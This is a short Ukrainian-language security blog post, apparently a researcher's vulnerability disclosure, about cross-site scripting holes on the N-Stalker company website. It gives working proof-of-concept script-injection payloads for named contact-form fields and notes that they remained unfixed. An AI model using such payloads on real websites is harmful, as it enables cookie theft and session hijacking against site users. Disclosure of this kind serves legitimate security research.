Уразливості на www.nstalker.com
20:05 24.11.200815.05.2008
У жовтні, 19.10.2007, я знайшов численні Cross-Site Scripting уразливості на http://www.nstalker.com - сайті секюріті компанії N-Stalker, розробника N-Stalker Web Application Security Scanner. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
24.11.2008
XSS:
POST запит на сторінці http://www.nstalker.com/about/contact
"><script>alert(document.cookie)</script>
В полях: Company, Name, Job Title, E-mail, Phone, City/State.
</textarea><script>alert(document.cookie)</script>
В полі: Comments.
XSS через GET:
Дані уразливості досі не виправлені.